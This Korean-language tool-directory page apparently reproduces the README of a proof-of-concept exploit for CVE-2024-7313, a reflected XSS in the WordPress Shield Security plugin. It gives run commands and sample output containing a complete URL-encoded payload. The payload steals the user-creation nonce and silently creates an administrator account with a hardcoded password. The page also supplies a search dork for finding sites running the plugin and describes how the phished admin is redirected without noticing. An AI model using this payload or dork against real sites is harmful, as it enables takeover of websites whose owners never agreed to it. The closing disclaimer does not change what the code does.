Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-7313 — WordPress 플러그인 Shield Security < 20.0.6를 통한 XSS에서 무단 관리자 계정 생성에 대한 커스텀 개념 증명 | Kitploit
도구/GitHubGitHub/wayne-ker/cve-2024-7313
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

WordPress 플러그인 Shield Security < 20.0.6를 통한 XSS에서 무단 관리자 계정 생성에 대한 커스텀 개념 증명

저장소 보기
312년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Shield Security 플러그인 취약점 익스플로잇 (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

개요

이 저장소는 WordPress용 Shield Security 플러그인(버전 20.0.6 미만)의 반사형 XSS 취약점을 익스플로잇하기 위한 Python PoC 스크립트를 포함합니다. 이 취약점(CVE-2024-7313)을 통해 공격자는 대상에 맞춤화된 악성 링크를 생성할 수 있으며, 관리자가 이를 클릭하면 XSS를 통해 승인되지 않은 관리자 계정이 생성됩니다. 이 스크립트는 취약한 설치를 자동으로 감지하고 취약점을 익스플로잇하기 위한 페이로드를 생성합니다.

취약점 정보

항목내용
CVECVE-2024-7313
플러그인Shield Security < 20.0.6
심각도높음
영향을 받는 시스템Shield Security 플러그인 버전 < 20.0.6을 사용하는 WordPress 웹사이트
공격 유형반사형 크로스 사이트 스크립팅 (XSS)
공개일2024년 8월 7일
OWASP TOP-10A7: 크로스 사이트 스크립팅 (XSS)

사용법

사전 요구 사항

  • Python 3.x
  • requests 및 beautifulsoup4 라이브러리

필요한 라이브러리를 설치합니다:

root@kitploit:~
pip install requests beautifulsoup4

스크립트 실행

  1. 저장소를 클론합니다:
root@kitploit:~
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
  1. 대상 URL로 스크립트를 실행합니다:
root@kitploit:~
python3 exploit.py <target_url>

예시:

root@kitploit:~
python3 exploit.py http://127.0.0.1

새 관리자 사용자에 필요한 세부 정보(사용자 이름, 이메일, 이름, 성)를 입력하면 스크립트가 페이로드 URL을 생성합니다. 이 URL을 브라우저에 붙여넣어 반사형 XSS 공격을 실행하면 WordPress 사이트에 새로운 관리자 사용자가 생성됩니다.

  1. 예시 출력:
root@kitploit:~
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
#    Reflected XSS in WordPress Shield Security Plugin                      #
#    Versions Affected: < 20.0.6                                            #
#    Risk: High                                                             #
#    Developed by: Wayne-Kerr                                              #
#    Published: August 7, 2024                                              #
############################################################################# 
Shield Security version is vulnerable. Let's continue.
Enter username: fakename
Enter email: [email protected]
Enter first name: Haxor
Enter last name: test

Using hardcoded password: HaxorStrongAFPassword123!!

Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E

생성된 XSS 페이로드 URL에 접속하면 익스플로잇이 실행되고 대상 WordPress 사이트에 새로운 관리자 사용자가 생성됩니다.

도움말 메뉴

다음을 실행하여 도움말 메뉴에 접근할 수 있습니다:

root@kitploit:~
python3 exploit.py -h

취약한 사이트를 찾기 위한 Dork

취약한 플러그인을 사용하는 웹사이트를 식별하려면 다음 dork를 사용할 수 있습니다:

root@kitploit:~
inurl:"/wp-content/plugins/wp-simple-firewall/"

이렇게 하면 Shield Security 플러그인이 설치된 웹사이트를 찾을 수 있습니다. 버전 번호는 공개적으로 표시되지 않으므로 수동 테스트가 필요할 수 있습니다.

작동 방식

  • 스크립트는 먼저 wp-login.php 페이지의 응답을 검사하여 대상 WordPress 설치가 취약한 버전의 Shield Security 플러그인을 사용하는지 확인합니다.
  • 플러그인 버전이 취약한 경우, 스크립트는 실행 시 하드코딩된 비밀번호로 새 관리자 사용자를 생성하는 반사형 XSS 페이로드를 생성합니다.
  • 페이로드는 먼저 GET 요청을 사용하여 계정 생성에 사용되는 WordPress nonce를 동적으로 찾은 다음, 그 nonce를 사용하여 스크립트에서 제공된 새 사용자의 세부 정보로 사용자 생성 엔드포인트에 POST 요청을 제출하도록 생성됩니다.
  • 그런 다음 페이로드는 URL 인코딩되어 공격에 사용할 수 있도록 표시됩니다.
  • 사이트 관리자에게 전송되어 링크가 클릭되면 스크립트에서 파싱된 세부 정보로 사이트에 새 관리자 사용자가 생성됩니다. 이 모든 작업은 백그라운드에서 수행되며, 피싱된 관리자는 백그라운드에서 익스플로잇이 진행되고 있다는 전혀 알지 못한 채 Shield Security 대시보드로 리디렉션됩니다.

면책 조항

이 도구는 교육 목적으로만 제공되며 승인된 침투 테스트 환경에서만 사용해야 합니다. 소유하지 않은 시스템에 대한 무단 접근 또는 사용은 불법입니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.

도구 다운로드